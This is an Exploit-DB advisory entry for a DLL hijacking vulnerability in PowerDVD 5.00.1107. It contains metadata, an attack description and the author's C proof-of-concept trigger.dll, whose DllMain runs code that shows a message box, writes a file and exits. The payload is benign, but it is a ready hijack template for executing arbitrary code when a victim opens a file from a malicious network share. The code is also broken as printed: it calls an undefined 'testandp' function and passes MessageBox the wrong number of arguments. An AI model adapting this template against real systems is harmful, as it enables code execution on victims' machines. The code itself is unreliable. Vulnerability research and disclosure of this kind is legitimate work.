PowerDVD DLL Hijacking Exploit

vendor:

PowerDVD

by:

Inj3cti0n P4ck3t

7.5

CVSS

HIGH

Arbitrary Code Execution

Not specified

CWE

Product Name: PowerDVD

Affected Version From: PowerDVD 5.00.1107

Affected Version To: Not specified

Patch Exists: NO

Related CWE: Not specified

CPE: Not specified

Metasploit:

Other Scripts:

Platforms Tested: Windows XP (Version 5.1 Service Pack 3)

2010

PowerDVD DLL Hijacking Exploit

This exploit allows attackers to execute arbitrary code by enticing a user to open a file from a network share location that contains a specially crafted DLL file. The vulnerability affects PowerDVD version 5.00.1107 and potentially other versions as well.

Mitigation:

Not specified

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/44193/info

PowerDVD is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

PowerDVD 5.00.1107 is vulnerable; other versions may also be affected. 

/*
[*] Author: Inj3cti0n P4ck3t					          				 
[*] e-mail: fer_henrick@hotmail.com					 				 
[*] Date: 18/10/2010	
[*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll)
[*] System tested: Windows XP (Version 5.1 Service Pack 3)
[*] PowerDVD.exe Version: 5.00.1107
[*] Software to Download: N�o dispon�vel
[*] Application Path: C:\Arquivos de programas\CyberLink\PowerDVD\PowerDVD.exe
[*] DLL Found => trigger.dll

Greetz: fvox
*/

#include <windows.h>
#include <stdio.h>

int testando()
{
    MessageBox(0, "Testando PoC", MB_OK);
    FILE *fp;
    fp = fopen("Inj3cti0nP4ck3t.txt", "w");
    fwrite("it works ;-)", 1, 12, fp);
    fclose(fp);
    exit(1);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
    testandp();
    return TRUE;
}